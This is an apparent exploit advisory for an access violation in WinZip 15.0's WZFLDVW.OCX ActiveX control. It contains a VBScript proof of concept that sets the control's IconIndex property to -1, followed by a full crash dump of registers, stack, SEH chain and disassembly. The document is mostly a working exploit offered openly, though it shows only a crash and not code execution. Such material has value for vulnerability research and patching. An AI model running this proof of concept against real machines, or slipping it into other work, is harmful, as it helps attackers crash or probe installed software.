131 lines
No EOL
3.6 KiB
Text
131 lines
No EOL
3.6 KiB
Text
# Exploit Title: Winzip WZFLDVW.OCX IconIndex property access violation
|
|
# Author: fady mohamed osman
|
|
# Software Link : http://www.winzip.com/downwz.htm
|
|
# Version: 15.0 (Build 9334)
|
|
# Tested on: Win XP Sp2
|
|
# CVE : N/A
|
|
|
|
# Website : http://www.darkmasters.co.cc/
|
|
# Twitter : http://twitter.com/Fady_Osman
|
|
|
|
|
|
<?XML version='1.0' standalone='yes' ?>
|
|
<package><job id='DoneInVBS' debug='false' error='true'>
|
|
<object classid='clsid:4E3770F4-1937-4F05-B9A2-959BE7321909' id='target' />
|
|
<script language='vbscript'>
|
|
|
|
|
|
'Wscript.echo typename(target)
|
|
|
|
'for debugging/custom prolog
|
|
targetFile = "C:\Program Files\WinZip\WZFLDVW.OCX"
|
|
prototype = "Invoke_Unknown IconIndex As Long"
|
|
memberName = "IconIndex"
|
|
progid = "FolderViewControl.TreeNode"
|
|
argCount = 1
|
|
|
|
arg1=-1
|
|
|
|
target.IconIndex = arg1
|
|
|
|
</script></job></package>
|
|
|
|
Exception Code: ACCESS_VIOLATION
|
|
Disasm: 1643C53 PUSH DWORD PTR [ESI+20]
|
|
|
|
Seh Chain:
|
|
--------------------------------------------------
|
|
1 180B82F wzfldvw.ocx
|
|
2 180B8F0 wzfldvw.ocx
|
|
3 73351571 VBSCRIPT.dll
|
|
4 73350F38 VBSCRIPT.dll
|
|
5 73351DA5 VBSCRIPT.dll
|
|
6 7335119D VBSCRIPT.dll
|
|
7 7C8399F3 KERNEL32.dll
|
|
|
|
|
|
Called From Returns To
|
|
--------------------------------------------------
|
|
wzfldvw.1643C53 wzfldvw.1631423
|
|
wzfldvw.1631423 wzfldvw.1666F8C
|
|
wzfldvw.1666F8C wzfldvw.16434A0
|
|
wzfldvw.16434A0 VBSCRIPT.73313A78
|
|
VBSCRIPT.73313A78 VBSCRIPT.733139F6
|
|
VBSCRIPT.733139F6 VBSCRIPT.73304B01
|
|
VBSCRIPT.73304B01 VBSCRIPT.73306959
|
|
VBSCRIPT.73306959 VBSCRIPT.73301E55
|
|
VBSCRIPT.73301E55 VBSCRIPT.73303A76
|
|
VBSCRIPT.73303A76 VBSCRIPT.7330BE2A
|
|
VBSCRIPT.7330BE2A VBSCRIPT.7330BEB9
|
|
VBSCRIPT.7330BEB9 SCROBJ.5CE4915E
|
|
SCROBJ.5CE4915E SCROBJ.5CE4CF9C
|
|
SCROBJ.5CE4CF9C SCROBJ.5CE4D0E2
|
|
SCROBJ.5CE4D0E2 SCROBJ.5CE4B106
|
|
SCROBJ.5CE4B106 SCROBJ.5CE4B49F
|
|
SCROBJ.5CE4B49F 100BB36
|
|
100BB36 1005EFE
|
|
1005EFE 1005215
|
|
1005215 100492B
|
|
100492B 1004A89
|
|
1004A89 1003C7B
|
|
1003C7B KERNEL32.7C816D4F
|
|
|
|
|
|
Registers:
|
|
--------------------------------------------------
|
|
EIP 01643C53
|
|
EAX BAADF00D
|
|
EBX 00000000
|
|
ECX BAADF00D
|
|
EDX 01642B94 -> 18EBD88B
|
|
EDI 00000008
|
|
ESI BAADF00D
|
|
EBP 0013EB1C -> 0013EB5C
|
|
ESP 0013EAF0 -> 00AE75F0
|
|
|
|
|
|
Block Disassembly:
|
|
--------------------------------------------------
|
|
1643C48 MOV EDI,EDI
|
|
1643C4A PUSH EBP
|
|
1643C4B MOV EBP,ESP
|
|
1643C4D SUB ESP,28
|
|
1643C50 PUSH ESI
|
|
1643C51 MOV ESI,ECX
|
|
1643C53 PUSH DWORD PTR [ESI+20] <--- CRASH
|
|
1643C56 CALL [182C978]
|
|
1643C5C TEST EAX,EAX
|
|
1643C5E JNZ SHORT 01643C65
|
|
1643C60 CALL 01635391
|
|
1643C65 MOV EAX,[EBP+8]
|
|
1643C68 TEST EAX,EAX
|
|
1643C6A JE SHORT 01643C60
|
|
1643C6C MOV [EBP-24],EAX
|
|
|
|
|
|
ArgDump:
|
|
--------------------------------------------------
|
|
EBP+8 BAADF00D
|
|
EBP+12 0013EB60 -> 01666F8C
|
|
EBP+16 00000022
|
|
EBP+20 BAADF00D
|
|
EBP+24 FFFFFFFF
|
|
EBP+28 0164299B -> 8B0020C2
|
|
|
|
|
|
Stack Dump:
|
|
--------------------------------------------------
|
|
13EAF0 F0 75 AE 00 0E 28 64 01 80 EB 13 00 28 ED 13 00 [.u....d.........]
|
|
13EB00 00 00 00 00 9B 29 64 01 DE 98 66 5E 08 00 00 00 [......d...f^....]
|
|
13EB10 60 EB 13 00 00 00 00 00 BA 75 91 7C 5C EB 13 00 [`........u..\...]
|
|
13EB20 23 14 63 01 0D F0 AD BA 60 EB 13 00 22 00 00 00 [..c.....`.......]
|
|
13EB30 0D F0 AD BA FF FF FF FF 9B 29 64 01 57 2B 64 01 [..........d.W.d.]
|
|
|
|
|
|
|
|
ApiLog
|
|
--------------------------------------------------
|
|
|
|
***** Installing Hooks *****
|
|
7c826cab CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
|
|
7c826cab CreateFileA(C:\WINDOWS\system32\rsaenh.dll) |